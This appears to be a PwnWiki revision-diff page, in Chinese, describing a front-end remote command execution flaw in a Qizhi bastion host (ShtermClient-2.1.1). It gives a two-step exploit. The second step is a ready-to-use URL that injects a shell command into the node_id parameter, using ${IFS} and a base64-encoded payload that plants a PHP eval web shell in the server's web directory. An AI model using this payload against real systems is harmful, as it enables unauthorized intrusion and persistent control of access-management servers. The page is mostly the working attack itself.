Difference between revisions of "齊治堡壘機前台遠程命令執行漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> <pre> ShtermClient-2.1.1 </pre> <translate> ==漏洞利用== </translate> <translate> ==漏洞利用== </translate...") |
(Marked this version for translation) |
||
| Line 2: | Line 2: | ||
<translate> | <translate> | ||
| − | ==漏洞影響== | + | ==漏洞影響== <!--T:1--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 9: | Line 9: | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:2--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:3--> |
</translate> | </translate> | ||
1.訪問 <code>http://10.20.10.11/listener/cluster\_manage.php</code> 返回OK; | 1.訪問 <code>http://10.20.10.11/listener/cluster\_manage.php</code> 返回OK; | ||
Latest revision as of 09:31, 10 April 2021
漏洞影響
ShtermClient-2.1.1
漏洞利用
漏洞利用
1.訪問 http://10.20.10.11/listener/cluster\_manage.php 返回OK;
2.訪問如下鏈接生成一句話木馬
https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}"ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUW3NoZWxsXSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9zaGVsbC5waHA="|base64${IFS}-d|bash`|${IFS}|echo${IFS}
